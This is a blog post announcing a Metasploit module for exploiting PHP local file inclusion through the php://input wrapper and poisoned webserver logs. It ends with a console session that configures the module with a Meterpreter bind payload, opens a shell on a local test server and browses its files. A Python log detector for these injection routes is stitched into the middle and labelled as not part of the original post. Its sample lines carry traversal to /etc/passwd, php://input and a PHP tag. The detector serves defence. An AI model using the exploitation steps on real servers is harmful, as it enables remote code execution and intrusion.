Metasploit PHP LFI exploit module
Last week I wrote a simple exploit module for Metasploit to attack PHP applications with LFI vulnerabilities.
It injects the code through the php://input wrapper or, when that route is not available, through the webserver logs.
If I had time, I would like to implement some tricks, like injecting PHP code into the SSH logs or the e-mail server logs, but it is not possible for now :)
Note: it is still buggy and the injection may fail depending on the length of the payload. Remember that PHP limits the size of the POST body, so a long payload may be truncated. The same limitation applies to log file injection.
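A detector for the two injection routes the module relies on (the php://input wrapper and poisoned webserver logs), as an added example that is not part of the original post or of the module: it parses constructed Combined Log Format lines (sample data, not real traffic) and flags query values carrying stream wrappers, path traversal or log-file paths, and Referer/User-Agent values carrying a PHP open tag. Field names and thresholds are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [24/May/2011:14:47:29 +0200] "GET /index.php?foo=../../../../etc/passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
127.0.0.1 - - [24/May/2011:14:47:30 +0200] "POST /index.php?foo=php://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [24/May/2011:14:47:31 +0200] "GET /index.php?foo=/var/log/apache2/access.log HTTP/1.1" 200 9000 "-" "<?php echo 'x'; ?>"
127.0.0.1 - - [24/May/2011:14:47:32 +0200] "GET /index.php?foo=about HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Combined Log Format: ip ident user [ts] "method target proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of an include() parameter being steered to a wrapper, another file, or a log.
WRAPPER_RE = re.compile(r'^(php|data|expect|file|phar|zip)://', re.I)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')
SENSITIVE_RE = re.compile(r'(/var/log/|/proc/self/|/etc/passwd)', re.I)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)  # open tag written into a log = poisoning attempt

def classify_request(line):
    """Return {'ip', 'target', 'findings'} for a parsable line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    params = parse_qsl(urlsplit(m['target']).query, keep_blank_values=True)
    for name, value in params:
        value = unquote(value)  # second decode catches double-encoded traversal
        if WRAPPER_RE.match(value):
            findings.append(f'stream wrapper in {name}')
        if TRAVERSAL_RE.search(value):
            findings.append(f'path traversal in {name}')
        if SENSITIVE_RE.search(value):
            findings.append(f'log/sensitive file path in {name}')
    # A PHP tag in a client-controlled header only matters once that log is included.
    for field in ('ref', 'ua'):
        if PHP_TAG_RE.search(m[field]):
            findings.append(f'PHP open tag in {field} (log poisoning attempt)')
    return {'ip': m['ip'], 'target': m['target'], 'findings': findings}

def scan_log(text):
    """Return the classified records that carry at least one finding."""
    alerts = []
    for line in text.splitlines():
        rec = classify_request(line)
        if rec and rec['findings']:
            alerts.append(rec)
    return alerts
```

Running scan_log(SAMPLE_LOG) flags the first three lines and leaves the plain request alone; the size limit the note above describes also means a poisoned log entry tends to be short, so a tag-based check catches it as well as a payload-based one.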
msf exploit(handler) > use exploit/unix/webapp/php_lfi
msf exploit(php_lfi) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_lfi) > set RPORT 8181
RPORT => 8181
msf exploit(php_lfi) > set URI /index.php?foo=xxLFIxx
URI => /index.php?foo=xxLFIxx
msf exploit(php_lfi) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_lfi) > exploit -z
[*] Started bind handler
[*] Trying generic exploits
[*] Clean LFI injection
[*] Sending stage (31612 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:19412 -> 127.0.0.1:4444) at Tue May 24 14:47:29 +0200 2011
^C[-] Exploit exception: Interrupt
[*] Session 1 created in the background.
msf exploit(php_lfi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: /usr/home/test/cherokee/www
====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 0 fil Tue May 10 11:09:39 +0200 2011 foo.php
40755/rwxr-xr-x 512 dir Tue May 10 10:53:59 +0200 2011 images
100644/rw-r--r-- 1795 fil Tue May 10 10:19:23 +0200 2011 index.html
100644/rw-r--r-- 37 fil Tue May 10 13:52:25 +0200 2011 index.php
meterpreter > sysinfo
OS : FreeBSD redphantom.skynet.ct 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Computer : redphantom.skynet.ct
Meterpreter : php/php
meterpreter > exit